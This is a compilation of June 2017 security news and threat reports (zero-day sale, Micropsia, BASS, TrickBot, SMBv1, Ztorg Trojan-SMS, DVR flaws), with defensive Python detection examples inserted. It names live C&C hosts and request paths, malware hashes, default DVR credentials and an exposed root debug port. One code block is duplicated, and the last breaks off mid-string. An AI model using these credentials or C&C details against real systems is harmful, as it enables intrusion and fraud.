"The offer first appeared on a website," explains the report, "that serves as an underground marketplace for Russian-speaking cybercriminals to buy and sell coding services, access to exploit kits and botnet resources, and other illegitimate products and services. A user going by the name 'BuggiCorp' posted a message on May 11 offering to sell a local privilege escalation (LPE) exploit for the Windows kernel for $95,000."

In part, the sale offer reads (translated): "[the vulnerability] exists in all OS [versions], starting from Windows 2000. [The] exploit is implemented for all OS architectures (x86 and x64), starting from Windows XP, including Windows Server versions, and up to current variants of Windows 10."

Trustwave concludes that this was a genuine zero-day being offered for sale, partly because the seller insisted on using the forum's administrator as an escrow party. "The escrow requirement," notes the report, "suggests the offer was real: If BuggiCorp could not deliver the exploit as promised, it would not get paid."

What most intrigued Munro, however, was not the sale of zero-days on the dark web; but the price being demanded. "If zero-days can trade at these figures on the dark web," he asked, "what does that say about the effectiveness of current bug bounty schemes, which rarely pay out anything like this amount?"


Spear Phishing Campaign Targets Palestinian Law Enforcement

21.6.2017 securityweek Phishing
Palestinian law enforcement agencies and other targets within Palestine were targeted in a spear phishing campaign delivering malware to remotely control infected systems, Talos researchers reveal.

The actor behind this campaign “has appeared to have used genuine documents stolen from Palestinian sources as well as a controversial music video as part of the attack,” Talos says. The attacker also referenced TV show characters and included German language words within the attack, researchers discovered.

Information on these attacks initially emerged in March from Chinese security firm Qihoo 360, and in early April, when researchers at Palo Alto Networks and ClearSky revealed four malware families being used in targeted campaigns in the Middle East: Windows-based Kasperagent and Micropsia, and Android-focused SecureUpdate and Vamp.

Last week, ThreatConnect shared some additional information on Kasperagent, saying the threat was mainly used as a reconnaissance tool and downloader, but that newer samples can also steal passwords from browsers, take screenshots, log keystrokes, execute arbitrary commands, and exfiltrate files.

Focusing on Micropsia, Talos’ new report also reveals that Palestinian law enforcement agencies were the main target in the analyzed campaign. The attack featured spear phishing emails purportedly coming from an individual named “Yasser Saad,” but which included a mismatch: the email address suggested “Yasser Saaid” was the sender.

A .r10 file was attached, suggesting it is part of a split archive, but instead it was a disguised RAR, with a malicious “InternetPolicy_xxx_pdf.exe” file inside. When the file is run, a decoy InternetPolicy.pdf file containing 7 pages is displayed, while the Micropsia Remote Administration Tool (RAT) is executed in the background.

Drive-by download campaigns that drop variants of the malware but use different decoy documents were also observed, Talos says.

Written in Delphi, the RAT uses a legitimate binary developed by OptimumX to create a shortcut to ensure persistence. The malware’s configuration file contains the User-Agent, the command and control (C&C) URL and the JSON keys used for the network communication.

Micropsia can connect to the C&C infrastructure to download and run an executable received in string format and then modified to become a binary file with the Hex2Bin Delphi API. It also uses WMI queries to get information about the anti-virus program running on the machine. These details are sent to the attacker.

The malware registers with the C&C via HTTP, sending information such as the filename of the executed malware and its version; the version of the infected operating system; and the hostname and username encoded in base64. The server responds in JSON format with an ID and three other Boolean values.

Talos reports that over 500 systems are already registered with the C&C server (the ID is incremented at each new infection). However, the researchers also suggest that some of these hosts could be security researcher sandbox systems.

Moreover, several German words were found in the network communication: Betriebssystem (operating system), Anwendung (application), and Ausfahrt (exit). This doesn’t mean the actor is German, but that they might be trying to cover their tracks.

“In this [campaign] one of the most surprising elements is the overt naming convention: the author deliberately uses references to several US TV shows and intentionally uses German words for malware communication. We have no indication if these inclusions are to confuse attribution, to mock analysts, or a lapse of trade craft. This is in contrast to the highly convincing decoy documents which appear to be copies of genuine documents relating to the current situation in Palestine which suggests a high degree of professionalism,” Talos concludes.


Cisco Releases Open Source Malware Signature Generator

20.6.2017 securityweek Security
Cisco’s Talos intelligence and research group announced on Monday the availability of a new open source framework designed for automatically generating antivirus signatures from malware.

The tool, named BASS, has been described as an automated signature synthesizer. The framework creates signatures from malware belonging to previously generated clusters and its main goals are to improve resource usage and make malware analysis easier.

Talos says BASS is designed to reduce the resource usage of Cisco’s ClamAV open source antivirus engine by generating more pattern-based signatures instead of hash-based signatures. The tool can also help reduce the workload of analysts who write pattern-based signatures.

The Python-based framework is implemented as a cluster of Docker containers, which makes it easily scalable, and it leverages web services to interact with other tools.

According to Talos, thousands of signatures are added to the ClamAV database every day and many of them are hash-based. The problem with hash-based signatures, compared to bytecode- and pattern-based signatures, is that a signature is used to identify a single file instead of an entire malware cluster. This has several disadvantages, including a bigger memory footprint.

Pattern-based signatures are easier to maintain compared to bytecode signatures, which is why Cisco prefers this type of signature.

The BASS framework takes malware clusters from various sources and each file is unpacked using ClamAV unpackers. Once the malware cluster is filtered to ensure that the files correspond to the input expected by BASS (i.e. Portable Executable files), the binaries are disassembled using IDA Pro or another disassembler, and the tool searches the samples for common code that can be used to generate the signature.

The source code for the Alpha version of BASS is available on GitHub. Cisco Talos will maintain the tool, but the company welcomes any feedback for improving its functionality.
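The contrast both BASS write-ups draw, between a hash signature that matches one file and a pattern signature that covers a whole cluster, as an added example in Python (not BASS code, which works on disassembled code rather than raw bytes). The sample "binaries", the family name and the byte stub they share are constructed for illustration; the signature lines follow the ClamAV .hdb (MD5:Size:Name) and .ndb (Name:TargetType:Offset:Hex) formats.

```python
import hashlib
from typing import Dict, List, Optional

MIN_PATTERN_LEN = 8      # shorter common runs are too likely to be coincidental
MIN_DISTINCT_BYTES = 4   # rejects shared padding such as runs of NUL bytes


def hash_signatures(samples: Dict[str, bytes], family: str) -> List[str]:
    """Hash-based signatures in ClamAV .hdb form (MD5:Size:Name): one per file,
    and each one matches only that exact file."""
    return [f"{hashlib.md5(data).hexdigest()}:{len(data)}:{family}"
            for _name, data in sorted(samples.items())]


def _is_useful(pattern: bytes) -> bool:
    """Filter out low-information runs that every PE shares (headers, padding):
    without this, the 'common code' of a cluster is usually a block of zeros."""
    return len(set(pattern)) >= MIN_DISTINCT_BYTES


def longest_common_pattern(blobs: List[bytes],
                           min_len: int = MIN_PATTERN_LEN) -> Optional[bytes]:
    """Longest contiguous byte string present in every blob that passes _is_useful.
    Brute force over windows of the shortest blob, from longest to shortest."""
    shortest = min(blobs, key=len)
    for length in range(len(shortest), min_len - 1, -1):
        for start in range(len(shortest) - length + 1):
            cand = shortest[start:start + length]
            if _is_useful(cand) and all(cand in blob for blob in blobs):
                return cand
    return None


def pattern_signature(samples: Dict[str, bytes], family: str) -> Optional[str]:
    """One ClamAV .ndb line for the whole cluster.
    Target type 1 = PE file, offset '*' = the pattern may appear anywhere."""
    pattern = longest_common_pattern(list(samples.values()))
    if pattern is None:
        return None
    return f"{family}:1:*:{pattern.hex()}"


def ndb_matches(signature: str, data: bytes) -> bool:
    """Match a fixed-hex .ndb signature (no wildcards) against a file body."""
    hex_pattern = signature.split(":")[3]
    return bytes.fromhex(hex_pattern) in data


def hdb_matches(signature: str, data: bytes) -> bool:
    """Match an .hdb signature: both size and MD5 must agree."""
    md5, size, _name = signature.split(":")
    return int(size) == len(data) and hashlib.md5(data).hexdigest() == md5


# Constructed cluster: three "variants" share a code stub (a plausible-looking
# x86 function prologue, invented for this example) but differ in strings and
# trailing padding. All also share a long NUL run after the MZ marker.
STUB = bytes.fromhex("558bec83ec40c745fc00000000e8aaaaaaaa85c0741c")
PAD = b"MZ" + b"\x00" * 32
SAMPLES = {
    "variant_a.exe": PAD + b"build-a" + STUB + b"\x00" * 8,
    "variant_b.exe": PAD + b"b-build-x" + STUB + b"\xcc" * 4,
    "variant_c.exe": PAD + b"c" + STUB,
}
# A fourth variant that was NOT in the cluster when signatures were written.
NEW_VARIANT = PAD + b"d-new" + STUB + b"\x90" * 3

if __name__ == "__main__":
    family = "Win.Trojan.Constructed"
    for line in hash_signatures(SAMPLES, family):
        print("hdb:", line, "matches new variant:", hdb_matches(line, NEW_VARIANT))
    sig = pattern_signature(SAMPLES, family)
    print("ndb:", sig, "matches new variant:", ndb_matches(sig, NEW_VARIANT))
```

The NUL-run filter is the caveat to take away: the longest byte string a cluster shares is usually format padding, so a pattern generator needs an information check before it emits anything.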


TrickBot gang is back with new campaigns targeting Payment Processors and CRM Providers
20.6.2017 securityaffairs BotNet

Threat actors behind the financial trojan TrickBot have been updating its campaigns targeting Payment Processors and CRM Providers.
Threat actors behind Banking Trojan TrickBot switched from financial institutions to Payment processors and CRM providers.

TrickBot was initially observed in September 2016 by researchers at the security firm Fidelis Cybersecurity, which linked it to the Dyre banking trojan.

The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).

The first TrickBot samples analyzed by the experts implemented a single data stealer module, but a few weeks later the researchers discovered a new sample including webinjects that appeared to be in the testing phase.

“In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.

“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”

TrickBot and Dyre have many similarities: the code of the new banking trojan seems to have been rewritten in a different coding style while retaining many of the same functionalities.

The malware was used in a number of attacks at the end of 2016 targeting banks in the UK and Australia, and Asian financial institutions.

In May, TrickBot was used to target 20 new private banking brands, eight building societies in the UK, two Swiss banks, private banking platforms in Germany, and four investment banking firms in the U.S.

Researchers at F5 analyzed 26 TrickBot configurations that were active in May 2017 when crooks also targeted two payment processing providers and two Customer Relationship Management (CRM) SaaS providers.

“In the 26 TrickBot configurations F5 researchers analyzed that were active in May 2017, targets expanded beyond banks to include two payment processing providers and two Customer Relationship Management (CRM) SaaS providers.” F5 reports. “The fact that payment processors were targets was a notable change that we also observed in Marcher, an Android banking trojan in March of 2017. It appears now that CRMs are a new target of attackers; is it because of their potential for collecting valuable user data that could enhance phishing campaigns?”

The F5 experts analyzed two distinct TrickBot infection campaigns that were active in May; they targeted 210 and 257 URLs respectively. Both campaigns targeted the same US payment processor (PayPal), but according to F5 only the second campaign targeted the CRM providers.

Looking at the campaigns, the experts discovered:

TrickBot gang

The first campaign:

Banks (83% of URL targets, 18% UK banks)
PayPal (a payment processor attributed to the US); 35 different PayPal URLs were also present in the configuration used in the second campaign.
Trickbot campaign 2

The second campaign:

Banks in the UK (47% of targets).
Payment processors, with the addition of a new payment processor URL in the UK.
CRMs: Salesforce.com and an auto sales CRM developed by Reynolds & Reynolds in the US.
Trickbot campaign 2

F5 identified six C&C IP addresses belonging to European web hosting provider networks, three of which are operated by hosting firms in Asia. All of the IP addresses used port 443/HTTPS for communication with the infected hosts in order to avoid detection.

F5 concludes that the TrickBot gang has extended its campaigns because of their success.

“It seems the success of TrickBot thus far has influenced the authors to not only repeat their previous target list of banks from previous campaigns but to expand those targets to include new banks globally as well as CRM providers. The fact that C&C servers in these two most recent campaigns reside within web hosting companies is also significant, along with the fact that the C&C servers were different from those used in previous campaigns,” F5 says.


Microsoft to Remove SMBv1 Protocol in Next Windows 10 Version (RedStone 3)
20.6.2017 thehackernews Safety

The Server Message Block version 1 (SMBv1) — a 30-year-old file sharing protocol which came to light last month after the devastating WannaCry outbreak — will be removed from the upcoming Windows 10 (1709) Redstone 3 Update.
SMBv1 is one of the internet's oldest networking protocols; it allows operating systems and applications to read and write data on a system and to request services from a server.
The WannaCry ransomware, which wreaked havoc last month, was also leveraging an NSA Windows SMB exploit, dubbed EternalBlue, leaked by the Shadow Brokers in its April data dump.
The WannaCry ransomware menace shut down hospitals, telecommunication providers, and many businesses worldwide, infecting hundreds of thousands of unpatched Windows servers running SMBv1 in more than 150 countries within just 72 hours on 12th of May.
Although Microsoft patched the vulnerability in SMBv1 in March in MS17-010, the company has meanwhile strongly advised users to disable the three-decades-old protocol completely.
And you should disable it completely.
I mean come on, since Windows Vista you have SMBv2 and later SMBv3, and you are continuing to allow the old and horribly insecure SMBv1 protocol to run on your network.
Strange! Because there's no excuse to continue.
Ned Pyle, the principal program manager for Microsoft's Windows Server High Availability and Storage division, also published a blog post this month listing products from other vendors that still use SMBv1 and begging them to stop using it now.
Pyle also hinted that the company has been planning to remove SMBv1 from Windows 10 Fall Creators Update (Version 1709), which is expected to release in September/October 2017.
"SMB1 is being removed (fully or partially, depending on SKU) by default in the RS3 release of Windows and Windows Server. This is coming, folks," Pyle wrote.
Microsoft has recently announced the beta release of Windows 10 "Creators Update," also known as "Redstone 2" (Version 1703), which disables the SMB1 protocol by default, and after testing and getting feedback from the community, the company has decided to completely remove the protocol in the next stable version of the operating system.
A Microsoft representative has just confirmed this to Threatpost, saying "We can confirm that SMBv1 is being removed for Redstone 3 [codename for the Windows 10 Fall Creators Update]."
Meanwhile, the company has published a document, which describes registry settings, PowerShell commands as well as group policy settings to disable SMBv1 in your Windows environment manually.


Ztorg: from rooting to SMS
20.6.2017 Kaspersky Android 

I’ve been monitoring Google Play Store for new Ztorg Trojans since September 2016, and have so far found several dozen new malicious apps. All of them were rooting malware that used exploits to gain root rights on the infected device.

Then, in the second half of May 2017, I found one that wasn’t. Distributed on Google Play through two malicious apps, it is related to the Ztorg Trojans, although it is not rooting malware but a Trojan-SMS that can send Premium rate SMS and delete incoming SMS. The apps had been installed from Google Play more than 50,000 and 10,000 times respectively.

Kaspersky Lab products detect the two Trojan apps as Trojan-SMS.AndroidOS.Ztorg.a. We reported the malware to Google, and both apps have been deleted from the Google Play Store.

The first malicious app, called “Magic browser” was uploaded to Google Play on May 15, 2017 and was installed more than 50,000 times.


Trojan-SMS.AndroidOS.Ztorg.a on Google Play Store

The second app, called “Noise Detector”, with the same malicious functionality, was installed more than 10,000 times.


Trojan-SMS.AndroidOS.Ztorg.a on Google Play Store

What can they do?

After starting, the Trojan will wait for 10 minutes before connecting to its command and control (C&C) server. It uses an interesting technique to get commands from the C&C: it makes two GET requests to the C&C, and in both includes part of the International Mobile Subscriber Identity (IMSI). The first request will look like this:

GET c.phaishey.com/ft/x250_c.txt, where 250 is the first three digits of the IMSI.

If the Trojan receives some data in return, it will make the second request. The second request will look like this:

GET c.phaishey.com/ft/x25001_0.txt, where 25001 is the first five digits of the IMSI.

Why does the Trojan need these digits from the IMSI?

The interesting thing about the IMSI is that the first three digits are the MCC (mobile country code) and the third and fourth digits are the MNC (mobile network code). Using these digits, the cybercriminals can identify the country and mobile operator of the infected user. They need this to choose which premium rate SMS should be sent.

In answer to these requests, the Trojan may receive an encrypted JSON file with some data. This data should include a list of offers, and every offer carries a string field called ‘url’, which may or may not contain an actual URL. The Trojan will try to open/view the field using its own class. If this value is indeed a URL, the Trojan will show its content to the user. But if it is something else and carries an “SMS” substring, the Trojan will send an SMS containing the supplied text to the number provided.
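The two-stage check-in described above, turned into detection logic over proxy logs, as an added example (not Kaspersky's code). The log format and the log lines are constructed; the C&C hostname and the /ft/x<MCC>_c.txt and /ft/x<MCC><MNC>_0.txt paths are the ones given in the write-up, and the MNC is taken as the digits that follow the three-digit MCC (two digits in the x25001 example, three on some networks).

```python
import re
from typing import List, NamedTuple, Optional, Tuple
from urllib.parse import urlsplit

# Beacon paths: stage 1 carries the MCC only, stage 2 the MCC followed by the MNC.
STAGE1_PATH = re.compile(r"^/ft/x(?P<mcc>\d{3})_c\.txt$")
STAGE2_PATH = re.compile(r"^/ft/x(?P<mcc>\d{3})(?P<mnc>\d{2,3})_0\.txt$")


class Beacon(NamedTuple):
    client: str
    host: str
    stage: int
    mcc: str
    mnc: str  # empty for a stage-1 request


def split_imsi(imsi: str, mnc_len: int = 2) -> Tuple[str, str]:
    """Return (MCC, MNC) from an IMSI: MCC is digits 1-3, MNC the mnc_len digits
    after it (2 as in the write-up's 25001 example; 3 on some networks)."""
    if not imsi.isdigit() or len(imsi) < 3 + mnc_len:
        raise ValueError("IMSI must be decimal digits at least MCC+MNC long")
    return imsi[:3], imsi[3:3 + mnc_len]


def parse_beacon(line: str) -> Optional[Beacon]:
    """Parse one constructed proxy-log line: '<ts> <client> <method> <url> <status>'
    and return a Beacon if the request path matches either C&C stage."""
    try:
        _ts, client, method, url, _status = line.split()
    except ValueError:
        return None
    if method != "GET":
        return None
    parts = urlsplit(url)
    m = STAGE1_PATH.match(parts.path)
    if m:
        return Beacon(client, parts.hostname or "", 1, m["mcc"], "")
    m = STAGE2_PATH.match(parts.path)
    if m:
        return Beacon(client, parts.hostname or "", 2, m["mcc"], m["mnc"])
    return None


def find_beacons(lines) -> List[Beacon]:
    return [b for b in (parse_beacon(line) for line in lines) if b is not None]


def confirmed_checkins(beacons: List[Beacon]) -> List[Tuple[str, str, str]]:
    """Clients whose stage-1 probe was followed by a stage-2 request to the same
    host with the same MCC, as (client, mcc, mnc). The Trojan only sends stage 2
    after stage 1 returned data, so the pair is a stronger signal than either
    request alone, and the MNC tells you which operator the victim is on."""
    seen_stage1 = set()
    confirmed = []
    for b in beacons:
        key = (b.client, b.host, b.mcc)
        if b.stage == 1:
            seen_stage1.add(key)
        elif key in seen_stage1:
            confirmed.append((b.client, b.mcc, b.mnc))
    return confirmed


# Constructed log: one benign request, one full two-stage check-in from 10.0.0.5
# (MCC 250, the Russian MCC from the write-up), and a stage-1 probe from 10.0.0.9
# that got no data back, so no stage 2 follows.
CONSTRUCTED_LOG = """\
2017-05-20T10:00:01Z 10.0.0.5 GET http://www.example.com/index.html 200
2017-05-20T10:10:02Z 10.0.0.5 GET http://c.phaishey.com/ft/x250_c.txt 200
2017-05-20T10:10:03Z 10.0.0.5 GET http://c.phaishey.com/ft/x25001_0.txt 200
2017-05-20T10:12:00Z 10.0.0.9 GET http://c.phaishey.com/ft/x262_c.txt 404"""

if __name__ == "__main__":
    found = find_beacons(CONSTRUCTED_LOG.splitlines())
    for b in found:
        print(b)
    print("confirmed:", confirmed_checkins(found))
```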


Malicious code where the Trojan decides if it should send an SMS.

This is an unusual way to send SMS. Just after it receives urls to visit, or SMS to send, the Trojan will turn off the device sound, and start to delete all incoming SMS.

I wasn’t able to get any commands for the Trojans distributed through Google Play. But for other Trojans located elsewhere that have the same functionality, I got the command:

{"icon":"http://down.rbksbtmk.com/pic/four-dault-06.jpg","id":"-1","name":"Brower","result":1,"status":1,"url":"http://global.621.co/trace?offer_id=111049&aff_id=100414&type=1"}

It was a regular advertising offer.
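The C&C exchange described above lends itself to proxy-log detection: the host and the two path shapes (a three-digit prefix with `_c.txt`, then a five-digit prefix with `_0.txt`) are distinctive. The following is an added example written for this page, not code from Kaspersky Lab or from the malware. It matches constructed proxy log lines (the log format, client addresses and timestamps are assumptions) against the request pattern, derives the two prefixes from an IMSI the way the article describes, and triages the `url` field of an offer using the rule the article gives (a real url is opened; a value containing "SMS" is an SMS instruction). The offer JSON quoted in the article is reused as triage input.

```python
import json
import re

# Constructed sample proxy log lines (not from the article). Only the C&C host
# and the two path shapes (3-digit prefix, then 5-digit prefix) come from the analysis.
SAMPLE_PROXY_LOG = """\
2017-06-15T10:03:11Z 10.0.0.12 GET http://c.phaishey.com/ft/x250_c.txt 200
2017-06-15T10:03:12Z 10.0.0.12 GET http://c.phaishey.com/ft/x25001_0.txt 200
2017-06-15T10:04:00Z 10.0.0.13 GET http://example.org/index.html 200
2017-06-15T10:05:30Z 10.0.0.14 GET http://c.phaishey.com/ft/x310_c.txt 404
"""

# The offer JSON quoted in the article, with straight quotes so it parses.
SAMPLE_OFFER = ('{"icon":"http://down.rbksbtmk.com/pic/four-dault-06.jpg","id":"-1",'
                '"name":"Brower","result":1,"status":1,'
                '"url":"http://global.621.co/trace?offer_id=111049&aff_id=100414&type=1"}')

ZTORG_CNC_HOST = "c.phaishey.com"
# First request: /ft/x<3 digits>_c.txt ; second request: /ft/x<5 digits>_0.txt
ZTORG_CNC_PATH = re.compile(r"^/ft/x(?P<prefix>\d{3}|\d{5})_(?P<stage>c|0)\.txt$")
URL_RE = re.compile(r"^https?://([^/]+)(/.*)$")


def imsi_prefixes(imsi):
    """Return the (3-digit, 5-digit) IMSI prefixes the Trojan embeds in its two requests."""
    if not imsi.isdigit() or len(imsi) < 5:
        raise ValueError("IMSI must be a string of at least five digits")
    return imsi[:3], imsi[:5]


def find_ztorg_beacons(log_text):
    """Return one record per proxy log line that matches the C&C request pattern."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # assumed format: time client method url status
        timestamp, client, _method, url, _status = parts
        m = URL_RE.match(url)
        if not m or m.group(1).lower() != ZTORG_CNC_HOST:
            continue
        pm = ZTORG_CNC_PATH.match(m.group(2))
        if not pm:
            continue
        hits.append({
            "time": timestamp,
            "client": client,
            "prefix": pm.group("prefix"),
            "stage": "mcc" if pm.group("stage") == "c" else "mcc+mnc",
        })
    return hits


def triage_offer(offer_json):
    """Classify each offer's 'url' field the way the article says the Trojan interprets it."""
    data = json.loads(offer_json)
    offers = data if isinstance(data, list) else [data]
    result = []
    for offer in offers:
        value = str(offer.get("url", ""))
        if value.lower().startswith(("http://", "https://")):
            kind = "advertising url (opened in a view)"
        elif "SMS" in value:
            kind = "SMS instruction (premium-rate fraud)"
        else:
            kind = "unrecognised"
        result.append((value, kind))
    return result


if __name__ == "__main__":
    for hit in find_ztorg_beacons(SAMPLE_PROXY_LOG):
        print(hit)
    print(triage_offer(SAMPLE_OFFER))
```

Two beacons from the same client a second apart, the first with a three-digit and the second with a five-digit prefix, are the shape to alert on; a single `_c.txt` request followed by nothing is consistent with the C&C returning no data, which the article notes happened for the Google Play samples.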

WAP billing subscriptions

I was able to find several more malicious apps with the same functionality distributed outside the Google Play Store. The interesting thing is that they don’t look like standalone Trojans, but more like an additional module for some other Trojan.

Further investigation revealed that these Trojans were installed by a regular Ztorg Trojan along with other Ztorg modules.

In a few of these Trojans, I found that they download a JS file from the malicious url using the MCC.

Malicious code where the Trojan downloads a JS file.

I downloaded several JS files, using different MCCs, to find out what the cybercriminals are going to do with users from different countries. I wasn’t able to get a file for a US MCC, but for the other countries that I tried I received files with some functions. All the files contain a function called “getAocPage”, which most likely references AoC – Advice of Charge. After analyzing these files, I found out that their main purpose is to perform clickjacking attacks on web pages with WAP billing. In doing so, the Trojan can steal money from the user’s mobile account. WAP billing works in a similar way to premium rate SMS, but usually in the form of subscriptions rather than the one-time payments typical of premium rate SMS.

JS file from a CnC for Russian users (MCC = 250)

This means that the urls which the Trojan receives from the CnC may not only be advertising urls, but also urls with WAP billing subscriptions. Furthermore, some Trojans with this functionality use CnC urls that contain “/subscribe/api/”, which may reference subscriptions too.

All of these Trojans, including the Trojans from Google Play, are trying to send SMS from any device. To do so they use lots of methods to send SMS:

Part of the “Magic browser” app’s code

In total, the “Magic browser” app tries to send SMS from 11 different places in its code. Cybercriminals are doing this in order to be able to send SMS from different Android versions and devices. Furthermore, I was able to find another modification of the Trojan-SMS.AndroidOS.Ztorg that is trying to send an SMS via the “am” command, although this approach should not work.

Connection with the Ztorg malware family

The “Magic browser” app was promoted in a similar way to other Ztorg Trojans. Both the “Magic browser” and “Noise detector” apps shared code similarities with other Ztorg Trojans. Furthermore, the latest version of the “Noise detector” app contains the encrypted file “girl.png” in the assets folder of the installation package. After decryption, this file becomes a Ztorg Trojan.

I found several more Trojans with the same functionality that were installed by a regular Ztorg Trojan along with the other Ztorg modules. And it isn’t the first case where additional Ztorg modules were distributed from Google Play as a standalone Trojan. In April 2017, I found that a malicious app called “Money Converter”, had been installed more than 10,000 times from Google Play. It uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

Trojan-SMS vs. rooting

There were two malicious apps on Google Play with the same functionality – “Noise Detector” and “Magic browser” – but I think that they each had a different purpose. “Magic browser” was uploaded first, and I assume that the cybercriminals were checking whether they were able to upload this kind of functionality. After they uploaded the malicious app they didn’t update it with newer versions.

But it is a different story with “Noise Detector” – here it looks like the cybercriminals were trying to upload an app infected with a regular version of the Ztorg Trojan. But in the process of uploading they decided to add some malicious functionality to make money while they were working on publishing the rooting malware. The history of “Noise Detector” updates proves it.

On May 20 they uploaded a clean app called “Noise Detector”. A few days later they updated it with another clean version.

Then, a few days after that, they uploaded a version to Google Play that contained an encrypted Ztorg Trojan, but without the possibility of decrypting and executing it. On the following day they finally updated their app with the Trojan-SMS functionality, but still didn’t add the possibility to execute the encrypted Ztorg module. It is likely that, if the app hadn’t been removed from Google Play, they would have added this functionality at the next stage. There is also the possibility that attempting to add this functionality is what alerted Google to the Trojan’s presence and resulted in its deletion.

Conclusions

We found a very unusual Trojan-SMS being distributed through Google Play. It not only uses around a dozen methods to send SMS, but also initializes these methods in an unusual way: by processing web-page loading errors using a command from the CnC. And it can open advertising urls. Furthermore, it is related to Ztorg malware with the same functionality, that is often installed by Ztorg as an additional module.

By analyzing these apps I found that cybercriminals are working on clickjacking WAP billing. It means that these Trojans may not only open ad urls, or send Premium rate SMS, but also open web-pages with WAP billing and steal money from a user’s account. To hide these activities the Trojans turn off the device sound and delete all incoming SMS.

This isn’t the first time that the cybercriminals have distributed Ztorg modules through Google Play. For example, in April 2017 they uploaded a module that can click on Google Play Store app buttons to install or even buy promoted apps.

Most likely, the attackers are publishing Ztorg modules to make some additional money while they are trying to upload the regular rooting Ztorg Trojan. I suggest this because one of the malicious apps had an encrypted Ztorg module but it wasn’t able to decrypt it.

MD5

F1EC3B4AD740B422EC33246C51E4782F
E448EF7470D1155B19D3CAC2E013CA0F
55366B684CE62AB7954C74269868CD91
A44A9811DB4F7D39CAC0765A5E1621AC
1142C1D53E4FBCEFC5CCD7A6F5DC7177


TrickBot Targets Payment Processors, CRM Providers

20.6.2017 securityweek BotNet
The banking Trojan TrickBot is no longer hitting only banks and financial institutions, but has also added payment processing and Customer Relationship Management (CRM) providers to its list of targets, F5 warns.

Supposedly developed by the same gang that previously operated the Dyre Trojan, TrickBot was first spotted in the summer of 2016, and initially detailed in October. By November, the malware was being used in widespread infection campaigns in the UK and Australia, and popped up in Asia the next month. Earlier this year, it started targeting the private banking sector.

The 26 active TrickBot configurations observed in May 2017 were targeting banks in the UK, Australia, US, Canada, New Zealand, Ireland, France, Germany, Switzerland, the Netherlands, Bulgaria, India, Singapore, and Hong Kong. All command and control (C&C) servers used as part of these campaigns were communicating with infected machines over port 443, F5 reports.

The list of the Trojan’s targets now also includes two payment processing providers and two CRM SaaS providers, yet TrickBot isn’t the first to include them. In March this year, the Marcher Android banking Trojan started hitting payment processors too, the researchers say.

The F5 researchers analyzed two TrickBot infection campaigns that were active in May, with one configuration packing 210 URL targets and the other including 257 URLs. Both campaigns targeted the same US payment processor (PayPal), but the CRM targets only appeared in the second campaign.

The first campaign, F5 reveals, focused mainly on banks (83% of URL targets) and PayPal (a payment processor attributed to the US), but targeted no US bank. A total of 35 unique PayPal URLs found in the configuration used in this campaign were targeted in the second campaign too, although it mainly focused on banks in the UK (47% of targets).

The second campaign expanded the list of targeted banking URLs and payment processors with the addition of a new payment processor URL in the UK. CRMs were also added to the list, namely Salesforce.com and an auto sales CRM developed by Reynolds & Reynolds in the US.

F5 identified 6 C&C IP addresses, all within European web hosting provider networks, three of which are operated by hosting firms in Asia. All use 443 / HTTPS for communication with the infected hosts, which allows them to hide the malicious traffic and evade detection, because many anti-virus solutions don’t inspect encrypted traffic.

“It seems the success of TrickBot thus far has influenced the authors to not only repeat their previous target list of banks from previous campaigns but to expand those targets to include new banks globally as well as CRM providers. The fact that C&C servers in these two most recent campaigns reside within web hosting companies is also significant, along with the fact that the C&C servers were different from those used in previous campaigns,” F5 says.


Botnets Can Exploit More Vulnerabilities in DVRs

20.6.2017 securityweek Vulnerability
Newly discovered vulnerabilities affecting DVR systems could open the door to new, more potent Internet of Things (IoT) botnets, Pen Test Partners security researchers warn.

Following months of investigation into the hardware and software security of more than 30 DVR brands, the researchers discovered a series of flaws that Mirai and other IoT botnets didn’t use, but which could have made these threats far more destructive. These include new telnet credentials and interfaces, as well as an exploitable buffer overflow over port 80 that impacts over 1 million devices.

The researchers also discovered new DVR brands that are vulnerable to Mirai but which researchers didn’t know about before, and say that DVRs can be used to disable house alarms. They also note that Mirai could have used more default telnet credentials (qazxsw), along with new telnet interfaces that run on ports other than 23.

The researchers found the non-standard telnet port 12323 that is used by some DVRs and which uses the same default credentials targeted by Mirai, along with an interface on TCP/9527, with credentials such as admin/blank or admin/123456, or similar, which led to a shell. Via directory traversal, an attacker could abuse the interface to recover the hashed passwords and crack them offline.

The source of the Mirai issue, the researchers suggest, lies in the manner in which DVR vendors customized the products received from a single original design manufacturer (ODM) called XiongMai. Although vendors could change the default credentials, they apparently had only a limited number of credentials to shuffle, and Mirai covers all of them.

However, botnets such as Mirai and Hajime aren’t the biggest threats to DVRs, the Pen Test Partners team argues. Because on some devices the web server running on port 80 is vulnerable to a buffer overflow via the GET request, remote code execution is possible. A botnet exploiting the issue could be larger than Mirai, the researchers say.

A debug interface running on port 9527 and which is present on most XM-based DVRs allows shell access as root with the credentials used for DVR login. Because the interface is port-forwarded by default, it’s likely discoverable on the public Internet in a home user & SME environment. It also packs a directory traversal vulnerability (CVE-2017-7577) and easily guessable default credentials.
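The practical question for a network owner is whether any DVR is reachable from the Internet on the services named above (telnet on 23, the non-standard telnet port 12323, the port 9527 debug shell, and the port 80 web server). The following is an added example for this page, not code from Pen Test Partners or from any DVR vendor: it runs over constructed flow records (the `key=value` record format, the addresses and the `dvr_hosts` inventory are all assumptions) and reports Internet-sourced connections to those ports on hosts tagged as DVRs. The RFC 1918 ranges define "inside"; everything else is treated as external, which is the exposure the article describes as the result of default port forwarding.

```python
import ipaddress

# Services the write-up ties to exposed DVRs; the labels are ours.
DVR_RISK_PORTS = {
    23: "telnet (Mirai default credentials)",
    12323: "non-standard telnet",
    9527: "debug shell interface",
    80: "web server (GET buffer overflow)",
}

# Only these ranges count as "inside"; any other source reaching a DVR is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow records (not real telemetry) in an assumed key=value format.
SAMPLE_FLOWS = """\
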